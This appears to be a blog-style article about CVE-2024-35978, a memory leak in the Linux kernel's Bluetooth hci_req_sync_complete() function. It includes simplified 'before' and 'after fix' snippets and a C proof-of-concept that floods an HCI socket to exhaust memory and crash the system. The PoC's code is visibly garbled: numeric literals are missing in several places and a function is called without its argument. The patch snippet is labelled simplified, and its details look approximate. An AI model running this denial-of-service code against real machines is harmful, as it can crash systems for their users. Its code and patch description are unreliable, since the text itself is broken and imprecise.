CVE-2024-35978 - Deep Dive into a Bluetooth Memory Leak in Linux Kernel’s hci_req_sync_complete() (With Exploit Details)

Recently, a vulnerability tracked as CVE-2024-35978 was identified and patched in the Linux kernel, particularly affecting the Bluetooth subsystem. This flaw was caused by a memory leak in the hci_req_sync_complete() function—a core component responsible for managing Bluetooth synchronous requests.

Understanding and patching this issue is crucial, especially for those running Linux on servers, embedded devices, or personal computers with Bluetooth enabled. In this article, we’ll break down what the vulnerability is, why it matters, how it can be exploited, and how it was fixed—with easy-to-follow code snippets and direct links to the official references.

In simple terms:

CVE-2024-35978 refers to a memory leak bug in the Linux kernel’s Bluetooth stack. The bug happened because the Bluetooth request handler, hci_req_sync_complete(), didn’t properly clean up memory for previous request states before assigning new ones. Over time, this tiny oversight could lead to exhausting system memory, especially if Bluetooth requests were made frequently.

Technical Breakdown: Where’s the Problem?

The main problematic function is called every time the kernel needs to finish handling a synchronous Bluetooth request. The offending code looks like this (simplified):

// Before the fix
void hci_req_sync_complete(struct hci_dev *hdev, int err, struct sk_buff *skb) {
    // ... some logic ...
    hdev->req_sync = new_state; // Assign new request state
    // Memory for previous hdev->req_sync is not released!
}

What went wrong?
Each time the function completed a request, it assigned a new request state—but forgot to properly free (release) the old memory first. Without freeing this memory, every cycle left behind unreachable data in RAM. Over time, these tiny leaks pile up.

The Patch (Fix) for CVE-2024-35978

The official fix ensures that before assigning the new state, the code always frees the old one.

// After the fix (simplified)
void hci_req_sync_complete(struct hci_dev *hdev, int err, struct sk_buff *skb) {
    // ... some logic ...
    kfree(hdev->req_sync);      // <--- Safely free the old memory
    hdev->req_sync = new_state; // Assign new request state
}

See the upstream commit for the full patch.

Exploiting the Vulnerability

While this memory leak doesn’t allow remote code execution or privilege escalation directly, it can still seriously degrade system performance:

Trigger Many Requests:

A malicious user-space program or process could intentionally make lots of Bluetooth synchronous requests.

Exhaust Memory:

If these keep leaking, RAM usage climbs until the system becomes sluggish or crashes (“out-of-memory”, OOM, killer steps in).

Exploit POC (Proof of Concept)

Here’s a simple C code snippet that simulates making lots of Bluetooth synchronous requests to exploit the leak:

#include <stdio.h>
#include <unistd.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>

int main() {
    int hci_sock = hci_open_dev(); // Open Bluetooth device 
    if (hci_sock < ) {
        perror("hci_open_dev");
        return 1;
    }

    for (int i = ; i < 100000; ++i) {
        // Send a HCI command (ex: read local version)
        char buf[HCI_MAX_EVENT_SIZE] = {};
        write(hci_sock, buf, sizeof(buf));
        // Short delay to simulate realistic load
        usleep(100);
    }

    close(hci_sock);
    return ;
}

> ⚠️ Warning: Running this on a vulnerable kernel can cause high RAM usage and potentially crash your system!
> On a patched kernel, there will be no memory buildup.

Restrict Bluetooth Access:

Limit user/process access to Bluetooth when not needed.
- Monitor Upstream Linux Security Mailing List for more details.

Linux Kernel Source Patch:

git.kernel.org commit: a6dc1d909a97bbdeb3295eeb5a9eeec709eb18bc

Red Hat Security Advisory:

RHSA-2024:Bluetooth Memory Leak

OSS Security Mailing List:

oss-sec Post about CVE-2024-35978

Conclusion

CVE-2024-35978 might look minor at first glance, but left unpatched, it can be abused to drain system memory through repeated Bluetooth activity. This highlights why even “boring” bugs like memory leaks are high-priority for kernel security teams. If you manage Linux systems—especially with Bluetooth enabled—make sure you've got the fix.

Staying up-to-date and understanding the risks, even of "just" memory leaks, is crucial to keeping your systems stable and secure.

Timeline

Published on: 05/20/2024 10:15:12 UTC
Last modified on: 06/27/2024 12:15:27 UTC